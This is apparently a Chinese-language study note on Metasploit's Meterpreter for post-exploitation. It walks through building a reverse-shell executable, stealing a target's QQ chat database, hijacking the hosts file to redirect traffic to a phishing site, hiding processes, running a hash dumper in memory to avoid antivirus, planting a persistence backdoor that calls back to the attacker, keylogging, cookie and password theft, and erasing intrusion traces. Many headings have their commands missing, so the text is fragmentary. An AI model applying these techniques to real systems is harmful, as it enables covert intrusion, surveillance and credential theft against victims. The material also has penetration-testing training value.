Meterpreter(内网渗透范畴)
Meterpreter是MSF框架中的一个扩展模块,作为溢出成功以后的攻击荷载使用,攻击荷载在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell链接。
Meterpreter shell作为渗透模块有很多有用的功能:
比如添加用户、隐藏东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
Meterpreter模块使用
利用kali生成反弹shell的执行程序
怎样在kali上传下载文件?
CRT上传下载。。。
之后双击met.exe并运行
开始监听:
类似于反弹shell,区别在于它还支持meterpreter的语法
直接查看文件内容,可以用来查看敏感文件
查看当前工作路径
反斜杠表示转义
下载文件
download C:\“Program Files”\Tencent\QQ\Users\123*456\Msg2.0.db /root/ 把目标主机上的QQ聊天记录下载到攻击主机的root目录下(是否要考虑变更你的QQ程序的安装路径了呢?)
修改并且查看文件
例如修改目标主机上的hosts文件,使得目标主机访问baidu时去到准备好的钓鱼网站。路径C:\WINDOWS\system32\drivers\etc\hosts
DNS解析:缓存——》hosts文件——》DNS服务器
search命令,在目标主机文件系统上查找搜索文件
portfwd命令,端口转发
例如目标主机上开启了3389,但是只允许特定IP访问,攻击主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开
route命令,显示目标主机的主机路由表
查看meterpreter注入到目标主机的进程所属用户
查看目标的主机系统信息
查看目标主机上运行的进程信息,结合migrate使用
migrate,将meterpreter会话移植到另一个进程
例如反弹的meterpreter会话是对方打开了一个你预置特殊代码的word文档而产生的,那么对方一旦关闭掉该word文档,我们获取到的meterpreter会话就会随之关闭,所以把会话进程注入到explorer.exe是一个好办法
muma.exe消失
execute命令,在目标主机上运行某个程序
例如我们目前注入进程到explorer.exe后,运行用户为超级管理员administrator。我们运行以下目标主机上的记事本程序
这样太明显,如果希望隐藏后台执行,加参数-H
我们运行目标主机上的cmd.exe程序,并以隐藏的方式直接交互到我们的meterpreter会话上。
命令:execute -H -i -f cmd.exe类似shell
在目标主机内存中直接执行我们攻击主机上的攻击程序,比如wce.exe(获取密码hash值),又比如木马等,这样可以避免攻击程序存储到目标主机硬盘上被发现或被查杀
获得meterpreter会话在目标主机上注入进程的进程号
shutdown命令:关闭目标主机
后渗透模块post/windows/gather/forensics/enum_drives调用 有问题
在获取meterpreter会话session后,调用post/windows/gather/forensics/enum_drives,可获取目标主机存储器信息
或者直接在meterpreter会话中以命令
run post/windows/gather/forensics/enum_drives调用
确定目标主机是否是一台虚拟机:run post/windows/gather/checkvm
如果目标主机是虚拟机,那么渗透意义不大
persistence后渗透模块向目标主机植入后门程序
命令:run persistence -X -i 5 -p 攻击者监听端口 -r攻击者监听的服务器地址
-X在目标主机上开机自启
-i不断尝试反向连接的时间间隔
后门程序:
提权命令getsystem
键盘记录功能
系统账号密码获取:
获取目标主机上的软件安装信息
获取目标主机上最近访问过的文档、链接信息
读取目标主机IE浏览器cookies等缓存信息,嗅探目标主机登录过的各类账号密码
入侵痕迹擦除